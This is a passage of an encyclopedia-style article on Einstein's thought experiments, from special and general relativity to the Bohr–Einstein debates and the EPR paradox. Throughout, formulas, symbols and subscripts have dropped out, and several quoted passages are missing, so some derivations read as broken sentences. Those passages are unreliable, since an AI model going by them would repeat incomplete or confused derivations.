(1638). Einstein had a highly visual understanding of physics. His work in the patent office "stimulated [him] to see the physical ramifications of theoretical concepts." These aspects of his thinking style inspired him to fill his papers with vivid practical detail making them quite different from, say, the papers of Lorentz or Maxwell. This included his use of thought experiments. Special relativity Pursuing a beam of light Late in life, Einstein recalled Einstein's recollections of his youthful musings are widely cited because of the hints they provide of his later great discovery. However, Norton has noted that Einstein's reminiscences were probably colored by a half-century of hindsight. Norton lists several problems with Einstein's recounting, both historical and scientific: 1. At 16 years old and a student at the Gymnasium in Aarau, Einstein would have had the thought experiment in late 1895 to early 1896. But various sources note that Einstein did not learn Maxwell's theory until 1898, in university. 2. A 19th century aether theorist would have had no difficulties with the thought experiment. Einstein's statement, "...there seems to be no such thing...on the basis of experience," would not have counted as an objection, but would have represented a mere statement of fact, since no one had ever traveled at such speeds. 3. An aether theorist would have regarded "...nor according to Maxwell's equations" as simply representing a misunderstanding on Einstein's part. Unfettered by any notion that the speed of light represents a cosmic limit, the aether theorist would simply have set velocity equal to c, noted that yes indeed, the light would appear to be frozen, and then thought no more of it. Rather than the thought experiment being at all incompatible with aether theories (which it is not), the youthful Einstein appears to have reacted to the scenario out of an intuitive sense of wrongness. He felt that the laws of optics should obey the principle of relativity. As he grew older, his early thought experiment acquired deeper levels of significance: Einstein felt that Maxwell's equations should be the same for all observers in inertial motion. From Maxwell's equations, one can deduce a single speed of light, and there is nothing in this computation that depends on an observer's speed. Einstein sensed a conflict between Newtonian mechanics and the constant speed of light determined by Maxwell's equations. Regardless of the historical and scientific issues described above, Einstein's early thought experiment was part of the repertoire of test cases that he used to check on the viability of physical theories. Norton suggests that the real importance of the thought experiment was that it provided a powerful objection to emission theories of light, which Einstein had worked on for several years prior to 1905. Magnet and conductor In the very first paragraph of Einstein's seminal 1905 work introducing special relativity, he writes: This opening paragraph recounts well-known experimental results obtained by Michael Faraday in 1831. The experiments describe what appeared to be two different phenomena: the motional EMF generated when a wire moves through a magnetic field (see Lorentz force), and the transformer EMF generated by a changing magnetic field (due to the Maxwell–Faraday equation). James Clerk Maxwell himself drew attention to this fact in his 1861 paper On Physical Lines of Force. In the latter half of Part II of that paper, Maxwell gave a separate physical explanation for each of the two phenomena. Although Einstein calls the asymmetry "well-known", there is no evidence that any of Einstein's contemporaries considered the distinction between motional EMF and transformer EMF to be in any way odd or pointing to a lack of understanding of the underlying physics. Maxwell, for instance, had repeatedly discussed Faraday's laws of induction, stressing that the magnitude and direction of the induced current was a function only of the relative motion of the magnet and the conductor, without being bothered by the clear distinction between conductor-in-motion and magnet-in-motion in the underlying theoretical treatment. Yet Einstein's reflection on this experiment represented the decisive moment in his long and tortuous path to special relativity. Although the equations describing the two scenarios are entirely different, there is no measurement that can distinguish whether the magnet is moving, the conductor is moving, or both. In a 1920 review on the Fundamental Ideas and Methods of the Theory of Relativity (unpublished), Einstein related how disturbing he found this asymmetry: Einstein needed to extend the relativity of motion that he perceived between magnet and conductor in the above thought experiment to a full theory. For years, however, he did not know how this might be done. The exact path that Einstein took to resolve this issue is unknown. We do know, however, that Einstein spent several years pursuing an emission theory of light, encountering difficulties that eventually led him to give up the attempt. That decision ultimately led to his development of special relativity as a theory founded on two postulates of which he could be sure. Expressed in contemporary physics vocabulary, his postulates were as follows: 1. The laws of physics take the same form in all inertial frames. 2. In any given inertial frame, the velocity of light c is the same whether the light be emitted by a body at rest or by a body in uniform motion. [Emphasis added by editor] Einstein's wording of the second postulate was one with which nearly all theorists of his day could agree. His wording is a far more intuitive form of the second postulate than the stronger version frequently encountered in popular writings and college textbooks. Trains, embankments, and lightning flashes The topic of how Einstein arrived at special relativity has been a fascinating one to many scholars: A lowly, twenty-six year old patent officer (third class), largely self-taught in physics and completely divorced from mainstream research, nevertheless in the year 1905 produced four extraordinary works (Annus Mirabilis papers), only one of which (his paper on Brownian motion) appeared related to anything that he had ever published before. Einstein's paper, On the Electrodynamics of Moving Bodies, is a polished work that bears few traces of its gestation. Documentary evidence concerning the development of the ideas that went into it consist of, quite literally, only two sentences in a handful of preserved early letters, and various later historical remarks by Einstein himself, some of them known only second-hand and at times contradictory. In regards to the relativity of simultaneity, Einstein's 1905 paper develops the concept vividly by carefully considering the basics of how time may be disseminated through the exchange of signals between clocks. In his popular work, Relativity: The Special and General Theory, Einstein translates the formal presentation of his paper into a thought experiment using a train, a railway embankment, and lightning flashes. The essence of the thought experiment is as follows: Observer M stands on an embankment, while observer M rides on a rapidly traveling train. At the precise moment that M and M coincide in their positions, lightning strikes points A and B equidistant from M and M. Light from these two flashes reach M at the same time, from which M concludes that the bolts were synchronous. The combination of Einstein's first and second postulates implies that, despite the rapid motion of the train relative to the embankment, M measures exactly the same speed of light as does M. Since M was equidistant from A and B when lightning struck, the fact that M receives light from B before light from A means that to M, the bolts were not synchronous. Instead, the bolt at B struck first. A routine supposition among historians of science is that, in accordance with the analysis given in his 1905 special relativity paper and in his popular writings, Einstein discovered the relativity of simultaneity by thinking about how clocks could be synchronized by light signals. The Einstein synchronization convention was originally developed by telegraphers in the middle 19th century. The dissemination of precise time was an increasingly important topic during this period. Trains needed accurate time to schedule use of track, cartographers needed accurate time to determine longitude, while astronomers and surveyors dared to consider the worldwide dissemination of time to accuracies of thousandths of a second. Following this line of argument, Einstein's position in the patent office, where he specialized in evaluating electromagnetic and electromechanical patents, would have exposed him to the latest developments in time technology, which would have guided him in his thoughts towards understanding the relativity of simultaneity. However, all of the above is supposition. In later recollections, when Einstein was asked about what inspired him to develop special relativity, he would mention his riding a light beam and his magnet and conductor thought experiments. He would also mention the importance of the Fizeau experiment and the observation of stellar aberration. "They were enough", he said. He never mentioned thought experiments about clocks and their synchronization. The routine analyses of the Fizeau experiment and of stellar aberration, that treat light as Newtonian corpuscles, do not require relativity. But problems arise if one considers light as waves traveling through an aether, which are resolved by applying the relativity of simultaneity. It is entirely possible, therefore, that Einstein arrived at special relativity through a different path than that commonly assumed, through Einstein's examination of Fizeau's experiment and stellar aberration. We therefore do not know just how important clock synchronization and the train and embankment thought experiment were to Einstein's development of the concept of the relativity of simultaneity. We do know, however, that the train and embankment thought experiment was the preferred means whereby he chose to teach this concept to the general public. Relativistic center-of-mass theorem Einstein proposed the equivalence of mass and energy in his final Annus Mirabilis paper. Over the next several decades, the understanding of energy and its relationship with momentum were further developed by Einstein and other physicists including Max Planck, Gilbert N. Lewis, Richard C. Tolman, Max von Laue (who in 1911 gave a comprehensive proof of from the stress–energy tensor), and Paul Dirac (whose investigations of negative solutions in his 1928 formulation of the energy–momentum relation led to the 1930 prediction of the existence of antimatter). Einstein's relativistic center-of-mass theorem of 1906 is a case in point. In 1900, Henri Poincaré had noted a paradox in modern physics as it was then understood: When he applied well-known results of Maxwell's equations to the equality of action and reaction, he could describe a cyclic process which would result in creation of a reactionless drive, i.e. a device which could displace its center of mass without the exhaust of a propellant, in violation of the conservation of momentum. Poincaré resolved this paradox by imagining electromagnetic energy to be a fluid having a given density, which is created and destroyed with a given momentum as energy is absorbed and emitted. The motions of this fluid would oppose displacement of the center of mass in such fashion as to preserve the conservation of momentum. Einstein demonstrated that Poincaré's artifice was superfluous. Rather, he argued that mass-energy equivalence was a necessary and sufficient condition to resolve the paradox. In his demonstration, Einstein provided a derivation of mass-energy equivalence that was distinct from his original derivation. Einstein began by recasting Poincaré's abstract mathematical argument into the form of a thought experiment: Einstein considered (a) an initially stationary, closed, hollow cylinder free-floating in space, of mass and length , (b) with some sort of arrangement for sending a quantity of radiative energy (a burst of photons) from the left to the right. The radiation has momentum Since the total momentum of the system is zero, the cylinder recoils with a speed (c) The radiation hits the other end of the cylinder in time (assuming ), bringing the cylinder to a stop after it has moved through a distance (d) The energy deposited on the right wall of the cylinder is transferred to a massless shuttle mechanism (e) which transports the energy to the left wall (f) and then returns to re-create the starting configuration of the system, except with the cylinder displaced to the left. The cycle may then be repeated. The reactionless drive described here violates the laws of mechanics, according to which the center of mass of a body at rest cannot be displaced in the absence of external forces. Einstein argued that the shuttle cannot be massless while transferring energy from the right to the left. If energy possesses the inertia the contradiction disappears. Modern analysis suggests that neither Einstein's original 1905 derivation of mass-energy equivalence nor the alternate derivation implied by his 1906 center-of-mass theorem are definitively correct. For instance, the center-of-mass thought experiment regards the cylinder as a completely rigid body. In reality, the impulse provided to the cylinder by the burst of light in step (b) cannot travel faster than light, so that when the burst of photons reaches the right wall in step (c), the wall has not yet begun to move. Ohanian has credited von Laue (1911) as having provided the first truly definitive derivation of . Impossibility of faster-than-light signaling In 1907, Einstein noted that from the composition law for velocities, one could deduce that there cannot exist an effect that allows faster-than-light signaling. Einstein imagined a strip of material that allows propagation of signals at the faster-than-light speed of (as viewed from the material strip). Imagine two observers, A and B, standing on the x-axis and separated by the distance . They stand next to the material strip, which is not at rest, but rather is moving in the negative x-direction with speed . A uses the strip to send a signal to B. From the velocity composition formula, the signal propagates from A to B with speed . The time required for the signal to propagate from A to B is given by The strip can move at any speed . Given the starting assumption , one can always set the strip moving at a speed such that . In other words, given the existence of a means of transmitting signals faster-than-light, scenarios can be envisioned whereby the recipient of a signal will receive the signal before the transmitter has transmitted it. About this thought experiment, Einstein wrote: General relativity Falling painters and accelerating elevators In his unpublished 1920 review, Einstein related the genesis of his thoughts on the equivalence principle: The realization "startled" Einstein, and inspired him to begin an eight-year quest that led to what is considered to be his greatest work, the theory of general relativity. Over the years, the story of the falling man has become an iconic one, much embellished by other writers. In most retellings of Einstein's story, the falling man is identified as a painter. In some accounts, Einstein was inspired after he witnessed a painter falling from the roof of a building adjacent to the patent office where he worked. This version of the story leaves unanswered the question of why Einstein might consider his observation of such an unfortunate accident to represent the happiest thought in his life. Einstein later refined his thought experiment to consider a man inside a large enclosed chest or elevator falling freely in space. While in free fall, the man would consider himself weightless, and any loose objects that he emptied from his pockets would float alongside him. Then Einstein imagined a rope attached to the roof of the chamber. A powerful "being" of some sort begins pulling on the rope with constant force. The chamber begins to move "upwards" with a uniformly accelerated motion. Within the chamber, all of the man's perceptions are consistent with his being in a uniform gravitational field. Einstein asked, "Ought we to smile at the man and say that he errs in his conclusion?" Einstein answered no. Rather, the thought experiment provided "good grounds for extending the principle of relativity to include bodies of reference which are accelerated with respect to each other, and as a result we have gained a powerful argument for a generalised postulate of relativity." Through this thought experiment, Einstein addressed an issue that was so well known, scientists rarely worried about it or considered it puzzling: Objects have "gravitational mass," which determines the force with which they are attracted to other objects. Objects also have "inertial mass," which determines the relationship between the force applied to an object and how much it accelerates. Newton had pointed out that, even though they are defined differently, gravitational mass and inertial mass always seem to be equal. But until Einstein, no one had conceived a good explanation as to why this should be so. From the correspondence revealed by his thought experiment, Einstein concluded that "it is impossible to discover by experiment whether a given system of coordinates is accelerated, or whether...the observed effects are due to a gravitational field." This correspondence between gravitational mass and inertial mass is the equivalence principle. An extension to his accelerating observer thought experiment allowed Einstein to deduce that "rays of light are propagated curvilinearly in gravitational fields." Early applications of the equivalence principle Einstein's formulation of special relativity was in terms of kinematics (the study of moving bodies without reference to forces). Late in 1907, his former mathematics professor, Hermann Minkowski, presented an alternative, geometric interpretation of special relativity in a lecture to the Göttingen Mathematical society, introducing the concept of spacetime. Einstein was initially dismissive of Minkowski's geometric interpretation, regarding it as überflüssige Gelehrsamkeit (superfluous learnedness). As with special relativity, Einstein's early results in developing what was ultimately to become general relativity were accomplished using kinematic analysis rather than geometric techniques of analysis. In his 1907 Jahrbuch paper, Einstein first addressed the question of whether the propagation of light is influenced by gravitation, and whether there is any effect of a gravitational field on clocks. In 1911, Einstein returned to this subject, in part because he had realized that certain predictions of his nascent theory were amenable to experimental test. By the time of his 1911 paper, Einstein and other scientists had offered several alternative demonstrations that the inertial mass of a body increases with its energy content: If the energy increase of the body is , then the increase in its inertial mass is Einstein asked whether there is an increase of gravitational mass corresponding to the increase in inertial mass, and if there is such an increase, is the increase in gravitational mass precisely the same as its increase in inertial mass? Using the equivalence principle, Einstein concluded that this must be so. To show that the equivalence principle necessarily implies the gravitation of energy, Einstein considered a light source separated along the z-axis by a distance above a receiver in a homogeneous gravitational field having a force per unit mass of 1 A certain amount of electromagnetic energy is emitted by towards According to the equivalence principle, this system is equivalent to a gravitation-free system which moves with uniform acceleration in the direction of the positive z-axis, with separated by a constant distance from In the accelerated system, light emitted from takes (to a first approximation) to arrive at But in this time, the velocity of will have increased by from its velocity when the light was emitted. The energy arriving at will therefore not be the energy but the greater energy given by According to the equivalence principle, the same relation holds for the non-accelerated system in a gravitational field, where we replace by the gravitational potential difference between and so that The energy arriving at is greater than the energy emitted by by the potential energy of the mass in the gravitational field. Hence corresponds to the gravitational mass as well as the inertial mass of a quantity of energy. To further clarify that the energy of gravitational mass must equal the energy of inertial mass, Einstein proposed the following cyclic process: (a) A light source is situated a distance above a receiver in a uniform gravitational field. A movable mass can shuttle between and (b) A pulse of electromagnetic energy is sent from to The energy is absorbed by (c) Mass is lowered from to releasing an amount of work equal to (d) The energy absorbed by is transferred to This increases the gravitational mass of to a new value (e) The mass is lifted back to , requiring the input of work (e) The energy carried by the mass is then transferred to completing the cycle. Conservation of energy demands that the difference in work between raising the mass and lowering the mass, , must equal or one could potentially define a perpetual motion machine. Therefore, In other words, the increase in gravitational mass predicted by the above arguments is precisely equal to the increase in inertial mass predicted by special relativity. Einstein then considered sending a continuous electromagnetic beam of frequency (as measured at ) from to in a homogeneous gravitational field. The frequency of the light as measured at will be a larger value given by Einstein noted that the above equation seemed to imply something absurd: Given that the transmission of light from to is continuous, how could the number of periods emitted per second from be different from that received at It is impossible for wave crests to appear on the way down from to . The simple answer is that this question presupposes an absolute nature of time, when in fact there is nothing that compels us to assume that clocks situated at different gravitational potentials must be conceived of as going at the same rate. The principle of equivalence implies gravitational time dilation. It is important to realize that Einstein's arguments predicting gravitational time dilation are valid for any theory of gravity that respects the principle of equivalence. This includes Newtonian gravitation. Experiments such as the Pound–Rebka experiment, which have firmly established gravitational time dilation, therefore do not serve to distinguish general relativity from Newtonian gravitation. In the remainder of Einstein's 1911 paper, he discussed the bending of light rays in a gravitational field, but given the incomplete nature of Einstein's theory as it existed at the time, the value that he predicted was half the value that would later be predicted by the full theory of general relativity. Non-Euclidean geometry and the rotating disk By 1912, Einstein had reached an impasse in his kinematic development of general relativity, realizing that he needed to go beyond the mathematics that he knew and was familiar with. Stachel has identified Einstein's analysis of the rigid relativistic rotating disk as being key to this realization. The rigid rotating disk had been a topic of lively discussion since Max Born and Paul Ehrenfest, in 1909, both presented analyses of rigid bodies in special relativity. An observer on the edge of a rotating disk experiences an apparent ("fictitious" or "pseudo") force called "centrifugal force". By 1912, Einstein had become convinced of a close relationship between gravitation and pseudo-forces such as centrifugal force: In the accompanying illustration, A represents a circular disk of 10 units diameter at rest in an inertial reference frame. The circumference of the disk is times the diameter, and the illustration shows 31.4 rulers laid out along the circumference. B represents a circular disk of 10 units diameter that is spinning rapidly. According to a non-rotating observer, each of the rulers along the circumference is length-contracted along its line of motion. More rulers are required to cover the circumference, while the number of rulers required to span the diameter is unchanged. Note that we have not stated that we set A spinning to get B. In special relativity, it is not possible to set spinning a disk that is "rigid" in Born's sense of the term. Since spinning up disk A would cause the material to contract in the circumferential direction but not in the radial direction, a rigid disk would become fragmented from the induced stresses. In later years, Einstein repeatedly stated that consideration of the rapidly rotating disk was of "decisive importance" to him because it showed that a gravitational field causes non-Euclidean arrangements of measuring rods. Einstein realized that he did not have the mathematical skills to describe the non-Euclidean view of space and time that he envisioned, so he turned to his mathematician friend, Marcel Grossmann, for help. After researching in the library, Grossman found a review article by Ricci and Levi-Civita on absolute differential calculus (tensor calculus). Grossman tutored Einstein on the subject, and in 1913 and 1914, they published two joint papers describing an initial version of a generalized theory of gravitation. Over the next several years, Einstein used these mathematical tools to generalize Minkowski's geometric approach to relativity so as to encompass curved spacetime. Quantum mechanics Background: Einstein and the quantum Many myths have grown up about Einstein's relationship with quantum mechanics. Freshman physics students are aware that Einstein explained the photoelectric effect and introduced the concept of the photon. But students who have grown up with the photon may not be aware of how revolutionary the concept was for his time. The best-known factoids about Einstein's relationship with quantum mechanics are his statement, "God does not play dice with the universe" and the indisputable fact that he just did not like the theory in its final form. This has led to the general impression that, despite his initial contributions, Einstein was out of touch with quantum research and played at best a secondary role in its development. Concerning Einstein's estrangement from the general direction of physics research after 1925, his well-known scientific biographer, Abraham Pais, wrote: In hindsight, we know that Pais was incorrect in his assessment. Einstein was arguably the greatest single contributor to the "old" quantum theory. In his 1905 paper on light quanta, Einstein created the quantum theory of light. His proposal that light exists as tiny packets (photons) was so revolutionary, that even such major pioneers of quantum theory as Planck and Bohr refused to believe that it could be true. Bohr, in particular, was a passionate disbeliever in light quanta, and repeatedly argued against them until 1925, when he yielded in the face of overwhelming evidence for their existence. In his 1906 theory of specific heats, Einstein was the first to realize that quantized energy levels explained the specific heat of solids. In this manner, he found a rational justification for the third law of thermodynamics (i.e. the entropy of any system approaches zero as the temperature approaches absolute zero): at very cold temperatures, atoms in a solid do not have enough thermal energy to reach even the first excited quantum level, and so cannot vibrate. Einstein proposed the wave-particle duality of light. In 1909, using a rigorous fluctuation argument based on a thought experiment and drawing on his previous work on Brownian motion, he predicted the emergence of a "fusion theory" that would combine the two views. Basically, he demonstrated that the Brownian motion experienced by a mirror in thermal equilibrium with black-body radiation would be the sum of two terms, one due to the wave properties of radiation, the other due to its particulate properties. Although Planck is justly hailed as the father of quantum mechanics, his derivation of the law of black-body radiation rested on fragile ground, since it required ad hoc assumptions of an unreasonable character. Furthermore, Planck's derivation represented an analysis of classical harmonic oscillators merged with quantum assumptions in an improvised fashion. In his 1916 theory of radiation, Einstein was the first to create a purely quantum explanation. This paper, well known for broaching the possibility of stimulated emission (the basis of the laser), changed the nature of the evolving quantum theory by introducing the fundamental role of random chance. In 1924, Einstein received a short manuscript by an unknown Indian professor, Satyendra Nath Bose, outlining a new method of deriving the law of blackbody radiation. Einstein was intrigued by Bose's peculiar method of counting the number of distinct ways of putting photons into the available states, a method of counting that Bose apparently did not realize was unusual. Einstein, however, understood that Bose's counting method implied that photons are, in a deep sense, indistinguishable. He translated the paper into German and had it published. Einstein then followed Bose's paper with an extension to Bose's work which predicted Bose–Einstein condensation, one of the fundamental research topics of condensed matter physics. While trying to develop a mathematical theory of light which would fully encompass its wavelike and particle-like aspects, Einstein developed the concept of "ghost fields". A guiding wave obeying Maxwell's classical laws would propagate following the normal laws of optics, but would not transmit any energy. This guiding wave, however, would govern the appearance of quanta of energy on a statistical basis, so that the appearance of these quanta would be proportional to the intensity of the interference radiation. These ideas became widely known in the physics community, and through Born's work in 1926, later became a key concept in the modern quantum theory of radiation and matter. Therefore, Einstein before 1925 originated most of the key concepts of quantum theory: light quanta, wave-particle duality, the fundamental randomness of physical processes, the concept of indistinguishability, and the probability density interpretation of the wave equation. In addition, Einstein can arguably be considered the father of solid state physics and condensed matter physics. He provided a correct derivation of the blackbody radiation law and sparked the notion of the laser. What of after 1925? In 1935, working with two younger colleagues, Einstein issued a final challenge to quantum mechanics, attempting to show that it could not represent a final solution. Despite the questions raised by this paper, it made little or no difference to how physicists employed quantum mechanics in their work. Of this paper, Pais was to write: In contrast to Pais' negative assessment, this paper, outlining the EPR paradox, has become one of the most widely cited articles in the entire physics literature. It is considered the centerpiece of the development of quantum information theory, which has been termed the "third quantum revolution." Wave-particle duality All of Einstein's major contributions to the old quantum theory were arrived at via statistical argument. This includes his 1905 paper arguing that light has particle properties, his 1906 work on specific heats, his 1909 introduction of the concept of wave-particle duality, his 1916 work presenting an improved derivation of the blackbody radiation formula, and his 1924 work that introduced the concept of indistinguishability. Einstein's 1909 arguments for the wave-particle duality of light were based on a thought experiment. Einstein imagined a mirror in a cavity containing particles of an ideal gas and filled with black-body radiation, with the entire system in thermal equilibrium. The mirror is constrained in its motions to a direction perpendicular to its surface. The mirror jiggles from Brownian motion due to collisions with the gas molecules. Since the mirror is in a radiation field, the moving mirror transfers some of its kinetic energy to the radiation field as a result of the difference in the radiation pressure between its forwards and reverse surfaces. This implies that there must be fluctuations in the black-body radiation field, and hence fluctuations in the black-body radiation pressure. Reversing the argument shows that there must be a route for the return of energy from the fluctuating black-body radiation field back to the gas molecules. Given the known shape of the radiation field given by Planck's law, Einstein could calculate the mean square energy fluctuation of the black-body radiation. He found the root mean square energy fluctuation in a small volume of a cavity filled with thermal radiation in the frequency interval between and to be a function of frequency and temperature: where would be the average energy of the volume in contact with the thermal bath. The above expression has two terms, the second corresponding to the classical Rayleigh-Jeans law (i.e. a wavelike term), and the first corresponding to the Wien distribution law (which from Einstein's 1905 analysis, would result from point-like quanta with energy ). From this, Einstein concluded that radiation had simultaneous wave and particle aspects. Bubble paradox Einstein from 1905 to 1923 was virtually the only physicist who took light-quanta seriously. Throughout most of this period, the physics community treated the light-quanta hypothesis with "skepticism bordering on derision" and maintained this attitude even after Einstein's photoelectric law was validated. The citation for Einstein's 1922 Nobel Prize very deliberately avoided all mention of light-quanta, instead stating that it was being awarded for "his services to theoretical physics and especially for his discovery of the law of the photoelectric effect". This dismissive stance contrasts sharply with the enthusiastic manner in which Einstein's other major contributions were accepted, including his work on Brownian motion, special relativity, general relativity, and his numerous other contributions to the "old" quantum theory. Various explanations have been given for this neglect on the part of the physics community. First and foremost was wave theory's long and indisputable success in explaining purely optical phenomena. Second was the fact that his 1905 paper, which pointed out that certain phenomena would be more readily explained under the assumption that light is particulate, presented the hypothesis only as a "heuristic viewpoint". The paper offered no compelling, comprehensive alternative to existing electromagnetic theory. Third was the fact that his 1905 paper introducing light quanta and his two 1909 papers that argued for a wave-particle fusion theory approached their subjects via statistical arguments that his contemporaries "might accept as theoretical exercise—crazy, perhaps, but harmless". Most of Einstein's contemporaries adopted the position that light is ultimately a wave, but appears particulate in certain circumstances only because atoms absorb wave energy in discrete units. Among the thought experiments that Einstein presented in his 1909 lecture on the nature and constitution of radiation was one that he used to point out the implausibility of the above argument. He used this thought experiment to argue that atoms emit light as discrete particles rather than as continuous waves: (a) An electron in a cathode ray beam strikes an atom in a target. The intensity of the beam is set so low that we can consider one electron at a time as impinging on the target. (b) The atom emits a spherically radiating electromagnetic wave. (c) This wave excites an atom in a secondary target, causing it to release an electron of energy comparable to that of the original electron. The energy of the secondary electron depends only on the energy of the original electron and not at all on the distance between the primary and secondary targets. All the energy spread around the circumference of the radiating electromagnetic wave would appear to be instantaneously focused on the target atom, an action that Einstein considered implausible. Far more plausible would be to say that the first atom emitted a particle in the direction of the second atom. Although Einstein originally presented this thought experiment as an argument for light having a particulate nature, it has been noted that this thought experiment, which has been termed the "bubble paradox", foreshadows the famous 1935 EPR paper. In his 1927 Solvay debate with Bohr, Einstein employed this thought experiment to illustrate that according to the Copenhagen interpretation of quantum mechanics that Bohr championed, the quantum wavefunction of a particle would abruptly collapse like a "popped bubble" no matter how widely dispersed the wavefunction. The transmission of energy from opposite sides of the bubble to a single point would occur faster than light, violating the principle of locality. In the end, it was experiment, not any theoretical argument, that finally enabled the concept of the light quantum to prevail. In 1923, Arthur Compton was studying the scattering of high energy X-rays from a graphite target. Unexpectedly, he found that the scattered X-rays were shifted in wavelength, corresponding to inelastic scattering of the X-rays by the electrons in the target. His observations were totally inconsistent with wave behavior, but instead could only be explained if the X-rays acted as particles. This observation of the Compton effect rapidly brought about a change in attitude, and by 1926, the concept of the "photon" was generally accepted by the physics community. Einstein's light box Einstein did not like the direction in which quantum mechanics had turned after 1925. Although excited by Heisenberg's matrix mechanics, Schroedinger's wave mechanics, and Born's clarification of the meaning of the Schroedinger wave equation (i.e. that the absolute square of the wave function is to be interpreted as a probability density), his instincts told him that something was missing. In a letter to Born, he wrote: The Solvay Debates between Bohr and Einstein began in dining-room discussions at the Fifth Solvay International Conference on Electrons and Photons in 1927. Einstein's issue with the new quantum mechanics was not just that, with the probability interpretation, it rendered invalid the notion of rigorous causality. After all, as noted above, Einstein himself had introduced random processes in his 1916 theory of radiation. Rather, by defining and delimiting the maximum amount of information obtainable in a given experimental arrangement, the Heisenberg uncertainty principle denied the existence of any knowable reality in terms of a complete specification of the momenta and description of individual particles, an objective reality that would exist whether or not we could ever observe it. Over dinner, during after-dinner discussions, and at breakfast, Einstein debated with Bohr and his followers on the question whether quantum mechanics in its present form could be called complete. Einstein illustrated his points with increasingly clever thought experiments intended to prove that position and momentum could in principle be simultaneously known to arbitrary precision. For example, one of his thought experiments involved sending a beam of electrons through a shuttered screen, recording the positions of the electrons as they struck a photographic screen. Bohr and his allies would always be able to counter Einstein's proposal, usually by the end of the same day. On the final day of the conference, Einstein revealed that the uncertainty principle was not the only aspect of the new quantum mechanics that bothered him. Quantum mechanics, at least in the Copenhagen interpretation, appeared to allow action at a distance, the ability for two separated objects to communicate at speeds greater than light. By 1928, the consensus was that Einstein had lost the debate, and even his closest allies during the Fifth Solvay Conference, for example Louis de Broglie, conceded that quantum mechanics appeared to be complete. At the Sixth Solvay International Conference on Magnetism (1930), Einstein came armed with a new thought experiment. This involved a box with a shutter that operated so quickly, it would allow only one photon to escape at a time. The box would first be weighed exactly. Then, at a precise moment, the shutter would open, allowing a photon to escape. The box would then be re-weighed. The well-known relationship between mass and energy would allow the energy of the particle to be precisely determined. With this gadget, Einstein believed that he had demonstrated a means to obtain, simultaneously, a precise determination of the energy of the photon as well as its exact time of departure from the system. Bohr was shaken by this thought experiment. Unable to think of a refutation, he went from one conference participant to another, trying to convince them that Einstein's thought experiment could not be true, that if it were true, it would literally mean the end of physics. After a sleepless night, he finally worked out a response which, ironically, depended on Einstein's general relativity. Consider the illustration of Einstein's light box: 1. After emitting a photon, the loss of weight causes the box to rise in the gravitational field. 2. The observer returns the box to its original height by adding weights until the pointer points to its initial position. It takes a certain amount of time for the observer to perform this procedure. How long it takes depends on the strength of the spring and on how well-damped the system is. If undamped, the box will bounce up and down forever. If over-damped, the box will return to its original position sluggishly (See Damped spring-mass system). 3. The longer that the observer allows the damped spring-mass system to settle, the closer the pointer will reach its equilibrium position. At some point, the observer will conclude that his setting of the pointer to its initial position is within an allowable tolerance. There will be some residual error in returning the pointer to its initial position. Correspondingly, there will be some residual error in the weight measurement. 4. Adding the weights imparts a momentum to the box which can be measured with an accuracy delimited by It is clear that where is the gravitational constant. Plugging in yields 5. General relativity informs us that while the box has been at a height different than its original height, it has been ticking at a rate different than its original rate. The red shift formula informs us that there will be an uncertainty in the determination of the emission time of the photon. 6. Hence, The accuracy with which the energy of the photon is measured restricts the precision with which its moment of emission can be measured, following the Heisenberg uncertainty principle. After finding his last attempt at finding a loophole around the uncertainty principle refuted, Einstein quit trying to search for inconsistencies in quantum mechanics. Instead, he shifted his focus to the other aspects of quantum mechanics with which he was uncomfortable, focusing on his critique of action at a distance. His next paper on quantum mechanics foreshadowed his later paper on the EPR paradox. Einstein was gracious in his defeat. The following September, Einstein nominated Heisenberg and Schroedinger for the Nobel Prize, stating, "I am convinced that this theory undoubtedly contains a part of the ultimate truth." EPR Paradox Einstein's fundamental dispute with quantum mechanics was not about whether God rolled dice, whether the uncertainty principle allowed simultaneous measurement of position and momentum, or even whether quantum mechanics was complete. It was about reality. Does a physical reality exist independent of our ability to observe it? To Bohr and his followers, such questions were meaningless. All that we can know are the results of measurements and observations. It makes no sense to speculate about an ultimate reality that exists beyond our perceptions. Einstein's beliefs had evolved over the years from those that he had held when he was young, when, as a logical positivist heavily influenced by his reading of David Hume and Ernst Mach, he had rejected such unobservable concepts as absolute time and space. Einstein believed: 1. A reality exists independent of our ability to observe it. 2. Objects are located at distinct points in spacetime and have their own independent, real existence. In other words, he believed in separability and locality. 3. Although at a superficial level, quantum events may appear random, at some ultimate level, strict causality underlies all processes in nature. Einstein considered that realism and localism were fundamental underpinnings of physics. After leaving Nazi Germany and settling in Princeton at the Institute for Advanced Study, Einstein began writing up a thought experiment that he had been mulling over since attending a lecture by Léon Rosenfeld in 1933. Since the paper was to be in English, Einstein enlisted the help of the 46-year-old Boris Podolsky, a fellow who had moved to the institute from Caltech; he also enlisted the help of the 26-year-old Nathan Rosen, also at the institute, who did much of the math. The result of their collaboration was the four page EPR paper, which in its title asked the question Can Quantum-Mechanical Description of Physical Reality be Considered Complete? After seeing the paper in print, Einstein found himself unhappy with the result. His clear conceptual visualization had been buried under layers of mathematical formalism. Einstein's thought experiment involved two particles that have collided or which have been created in such a way that they have properties which are correlated. The total wave function for the pair links the positions of the particles as well as their linear momenta. The figure depicts the spreading of the wave function from the collision point. However, observation of the position of the first particle allows us to determine precisely the position of the second particle no matter how far the pair have separated. Likewise, measuring the momentum of the first particle allows us to determine precisely the momentum of the second particle. "In accordance with our criterion for reality, in the first case we must consider the quantity P as being an element of reality, in the second case the quantity Q is an element of reality." Einstein concluded that the second particle, which we have never directly observed, must have at any moment a position that is real and a momentum that is real. Quantum mechanics does not account for these features of reality. Therefore, quantum mechanics is not complete. It is known, from the uncertainty principle, that position and momentum cannot be measured at the same time. But even though their values can only be determined in distinct contexts of measurement, can they both be definite at the same time? Einstein concluded that the answer must be yes. The only alternative, claimed Einstein, would be to assert that measuring the first particle instantaneously affected the reality of the position and momentum of the second particle. "No reasonable definition of reality could be expected to permit this." Bohr was stunned when he read Einstein's paper and spent more than six weeks framing his response, which he gave exactly the same title as the EPR paper. The EPR paper forced Bohr to make a major revision in his understanding of complementarity in the Copenhagen interpretation of quantum mechanics. Prior to EPR, Bohr had maintained that disturbance caused by the act of observation was the physical explanation for quantum uncertainty. In the EPR thought experiment, however, Bohr had to admit that "there is no question of a mechanical disturbance of the system under investigation." On the other hand, he noted that the two particles were one system described by one quantum function. Furthermore, the EPR paper did nothing to dispel the uncertainty principle. Later commentators have questioned the strength and coherence of Bohr's response. As a practical matter, however, physicists for the most part did not pay much attention to the debate between Bohr and Einstein, since the opposing views did not affect one's ability to apply quantum mechanics to practical problems, but only affected one's interpretation of the quantum 